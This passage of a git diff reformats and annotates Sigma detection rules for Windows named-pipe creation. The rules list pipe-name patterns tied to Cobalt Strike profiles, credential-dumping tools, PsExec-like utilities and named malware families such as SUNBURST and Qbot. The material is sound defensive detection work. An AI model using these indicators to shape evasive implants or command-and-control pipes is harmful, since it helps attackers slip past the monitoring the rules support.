PipeName|re: \\msrpc_[0-9a-f]{4} - - PipeName|re: \\win\\msrpc_[0-9a-f]{2} - - PipeName|re: \\f53f[0-9a-f]{2} - - PipeName|re: \\rpc_[0-9a-f]{2} - - PipeName|re: \\spoolss_[0-9a-f]{2} - - PipeName|re: \\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0, + - PipeName|re: \\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2} + - PipeName|re: \\wkssvc_?[0-9a-f]{2} + - PipeName|re: \\ntsvcs[0-9a-f]{2} + - PipeName|re: \\DserNamePipe[0-9a-f]{2} + - PipeName|re: \\SearchTextHarvester[0-9a-f]{2} + - PipeName|re: \\mypipe-(?:f|h)[0-9a-f]{2} + - PipeName|re: \\windows\.update\.manager[0-9a-f]{2,3} + - PipeName|re: \\ntsvcs_[0-9a-f]{2} + - PipeName|re: \\scerpc_?[0-9a-f]{2} + - PipeName|re: \\PGMessagePipe[0-9a-f]{2} + - PipeName|re: \\MsFteWds[0-9a-f]{2} + - PipeName|re: \\f4c3[0-9a-f]{2} + - PipeName|re: \\fullduplex_[0-9a-f]{2} + - PipeName|re: \\msrpc_[0-9a-f]{4} + - PipeName|re: \\win\\msrpc_[0-9a-f]{2} + - PipeName|re: \\f53f[0-9a-f]{2} + - PipeName|re: \\rpc_[0-9a-f]{2} + - PipeName|re: \\spoolss_[0-9a-f]{2} + - PipeName|re: \\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0, condition: pipe_created and selection falsepositives: - Unknown diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml index 478d31e2b..65fb42fc6 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml @@ -1,13 +1,12 @@ title: CobaltStrike Named Pipe Patterns id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 related: - - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a - type: similar - - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 - type: similar + - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex + type: similar + - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic + type: similar status: test -description: Detects the creation of a named pipe with a pattern found in CobaltStrike - malleable C2 profiles +description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 @@ -23,14 +22,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular You can also use other repo, - e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. - How to test detection? You can always use Cobalt Strike, but also you can - check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -38,30 +30,30 @@ detection: - 18 Channel: Microsoft-Windows-Sysmon/Operational selection_malleable_profile_generic: - - PipeName|startswith: - - \DserNamePipe - - \f4c3 - - \f53f - - \fullduplex_ - - \mojo.5688.8052.183894939787088877 - - \mojo.5688.8052.35780273329370473 - - \MsFteWds - - \msrpc_ - - \mypipe-f - - \mypipe-h - - \ntsvcs - - \PGMessagePipe - - \rpc_ - - \scerpc - - \SearchTextHarvester - - \spoolss - - \win_svc - - \win\msrpc_ - - \windows.update.manager - - \wkssvc - - PipeName: - - \demoagent_11 - - \demoagent_22 + - PipeName|startswith: + - \DserNamePipe + - \f4c3 + - \f53f + - \fullduplex_ + - \mojo.5688.8052.183894939787088877 + - \mojo.5688.8052.35780273329370473 + - \MsFteWds + - \msrpc_ + - \mypipe-f + - \mypipe-h + - \ntsvcs + - \PGMessagePipe + - \rpc_ + - \scerpc + - \SearchTextHarvester + - \spoolss + - \win_svc + - \win\msrpc_ + - \windows.update.manager + - \wkssvc + - PipeName: + - \demoagent_11 + - \demoagent_22 selection_malleable_profile_catalog_change_listener: PipeName|startswith: \Winsock2\CatalogChangeListener- PipeName|endswith: -0, diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml index 9918a19e4..b0978905d 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml @@ -15,12 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml index 0ec7b8056..a767491f6 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml @@ -1,8 +1,7 @@ title: HackTool - DiagTrackEoP Default Named Pipe id: 1f7025a6-e747-4130-aac4-961eb47015f1 status: experimental -description: Detects creation of default named pipe used by the DiagTrackEoP POC, - a tool that abuses "SeImpersonate" privilege. +description: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege. references: - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22 author: Nasreddine Bencherchali (Nextron Systems) @@ -14,12 +13,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -27,7 +21,7 @@ detection: - 18 Channel: Microsoft-Windows-Sysmon/Operational selection: - PipeName|contains: thisispipe + PipeName|contains: thisispipe # Based on source code condition: pipe_created and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml index a1acbeff9..60de51836 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml @@ -16,12 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -31,13 +26,13 @@ detection: selection: PipeName|contains: - \pipe\ - - \pipe\srvsvc + - \pipe\srvsvc # more specific version (use only this one if the other causes too many false positives) filter_optional_ctx: PipeName|contains: \CtxShare filter_optional_default: - PipeName|startswith: \pipe\ + PipeName|startswith: \pipe\ # excludes pipes that start with \pipe\* condition: pipe_created and (selection and not 1 of filter_optional_*) falsepositives: - - \pipe\LOCAL\Monitorian + - \pipe\LOCAL\Monitorian # https://github.com/emoacht/Monitorian level: high ruletype: Sigma diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml index 2ea23f44d..a57317ea5 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml @@ -1,8 +1,7 @@ title: HackTool - Credential Dumping Tools Named Pipe Created id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e status: test -description: Detects well-known credential dumping tools execution via specific named - pipe creation +description: Detects well-known credential dumping tools execution via specific named pipe creation references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799 @@ -19,12 +18,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml index 55e631a48..d674ff91e 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml @@ -16,12 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml index 79e30f097..076f2106c 100644 --- a/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml @@ -1,11 +1,10 @@ title: Alternate PowerShell Hosts Pipe id: 58cb02d5-78ce-4692-b3e1-dce850aae41a related: - - id: ac7102b4-9e1e-4802-9b4f-17c5524c015c - type: derived + - id: ac7102b4-9e1e-4802-9b4f-17c5524c015c + type: derived status: test -description: Detects alternate PowerShell hosts potentially bypassing detections looking - for powershell.exe +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html @@ -19,12 +18,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -35,10 +29,10 @@ detection: PipeName|startswith: \PSHost filter_main_generic: Image|contains: - - :\Program Files\PowerShell\7-preview\pwsh.exe - - :\Program Files\PowerShell\7\pwsh.exe + - :\Program Files\PowerShell\7-preview\pwsh.exe # Powershell 7 + - :\Program Files\PowerShell\7\pwsh.exe # Powershell 7 - :\Windows\system32\dsac.exe - - :\Windows\system32\inetsrv\w3wp.exe + - :\Windows\system32\inetsrv\w3wp.exe # this is sad :,( but it triggers FPs on Exchange servers - :\Windows\System32\sdiagnhost.exe - :\Windows\system32\ServerManager.exe - :\Windows\system32\wbem\wmiprvse.exe @@ -47,7 +41,7 @@ detection: - :\Windows\System32\wsmprovhost.exe - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - filter_main_sqlserver: + filter_main_sqlserver: # Microsoft SQL Server\130\Tools\ Image|contains|all: - :\Program Files - \Microsoft SQL Server\ @@ -57,9 +51,8 @@ detection: filter_optional_exchange: Image|contains: :\Program Files\Microsoft\Exchange Server\ filter_main_null: - Image: null - condition: pipe_created and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + Image: + condition: pipe_created and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter. level: medium diff --git a/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml index a2538b49d..9d664d917 100644 --- a/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml @@ -1,11 +1,10 @@ title: New PowerShell Instance Created id: ac7102b4-9e1e-4802-9b4f-17c5524c015c related: - - id: 58cb02d5-78ce-4692-b3e1-dce850aae41a - type: derived + - id: 58cb02d5-78ce-4692-b3e1-dce850aae41a + type: derived status: test -description: Detects the execution of PowerShell via the creation of a named pipe - starting with PSHost +description: Detects the execution of PowerShell via the creation of a named pipe starting with PSHost references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html @@ -19,12 +18,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml index dc869c7b1..2d14eff8e 100644 --- a/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml @@ -1,8 +1,8 @@ title: PUA - CSExec Default Named Pipe id: f318b911-ea88-43f4-9281-0de23ede628e related: - - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 - type: obsoletes + - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 + type: obsoletes status: test description: Detects default CSExec pipe creation references: @@ -20,12 +20,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml index cb2eda2d5..7bf681fbe 100644 --- a/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml @@ -14,12 +14,7 @@ tags: logsource: category: pipe_created product: windows - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml index ae86db4b0..bd9f93b2d 100644 --- a/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml @@ -1,8 +1,8 @@ title: PUA - RemCom Default Named Pipe id: d36f87ea-c403-44d2-aa79-1a0ac7c24456 related: - - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 - type: obsoletes + - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 + type: obsoletes status: test description: Detects default RemCom pipe creation references: @@ -20,12 +20,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml b/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml index 8055e6443..d52138c0b 100644 --- a/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml @@ -14,12 +14,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml b/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml index cc619c56d..409dd89bf 100644 --- a/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml +++ b/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml @@ -26,12 +26,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -40,33 +35,34 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: PipeName: - - \46a676ab7f179e511e30dd2dc41bd388 - - \583da945-62af-10e8-4902-a8f205c72b2e - - \6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 - - \9f81f59bc58452127884ce513865ed20 - - \adschemerpc - - \ahexec - - \AnonymousPipe - - \bc31a7 - - \bc367 - - \bizkaz - - \csexecsvc - - \dce_3d - - \e710f28d59aa529d6792ca6ff0ca1b34 - - \gruntsvc - - \isapi_dg - - \isapi_dg2 - - \isapi_http - - \jaccdpqnvbrrxlaf - - \lsassw - - \NamePipe_MoreWindows - - \pcheap_reuse - - \Posh* - - \rpchlp_3 - - \sdlrpc - - \svcctl - - \testPipe - - \winsession + - \46a676ab7f179e511e30dd2dc41bd388 # Project Sauron + - \583da945-62af-10e8-4902-a8f205c72b2e # SolarWinds SUNBURST malware + - \6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 # LiquidSnake + - \9f81f59bc58452127884ce513865ed20 # Project Sauron + - \adschemerpc # Turla HyperStack + - \ahexec # Sofacy group malware + - \AnonymousPipe # Hidden Cobra Hoplight + - \bc31a7 # Pacifier + - \bc367 # Pacifier + - \bizkaz # Snatch Ransomware + - \csexecsvc # CSEXEC default + - \dce_3d # Qbot + - \e710f28d59aa529d6792ca6ff0ca1b34 # Project Sauron + - \gruntsvc # Covenant default + - \isapi_dg # Uroburos Malware + - \isapi_dg2 # Uroburos Malware + - \isapi_http # Uroburos Malware + - \jaccdpqnvbrrxlaf # PoshC2 default + - \lsassw # Wild Neutron APT malware + - \NamePipe_MoreWindows # Cloud Hopper - RedLeaves + - \pcheap_reuse # Pipe used by Equation Group malware + - \Posh* # PoshC2 default + - \rpchlp_3 # Project Sauron + - \sdlrpc # Cobra Trojan + - \svcctl # Crackmapexec smbexec default + - \testPipe # Emissary Panda Hyperbro + - \winsession # Wild Neutron APT malware + # - '\status_*' # CS default https://github.com/SigmaHQ/sigma/issues/253 condition: pipe_created and selection falsepositives: - Unknown diff --git a/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml b/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml index 6545f5e1a..9e9963e88 100644 --- a/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml +++ b/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml @@ -1,12 +1,10 @@ title: PsExec Tool Execution From Suspicious Locations - PipeName id: 41504465-5e3a-4a5b-a5b4-2a0baadd4463 related: - - id: f3f3a972-f982-40ad-b63c-bca6afdfad7c - type: derived + - id: f3f3a972-f982-40ad-b63c-bca6afdfad7c + type: derived status: experimental -description: Detects PsExec default pipe creation where the image executed is located - in a suspicious location. Which could indicate that the tool is being used in - an attack +description: Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet @@ -21,12 +19,7 @@ tags: logsource: category: pipe_created product: windows - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration 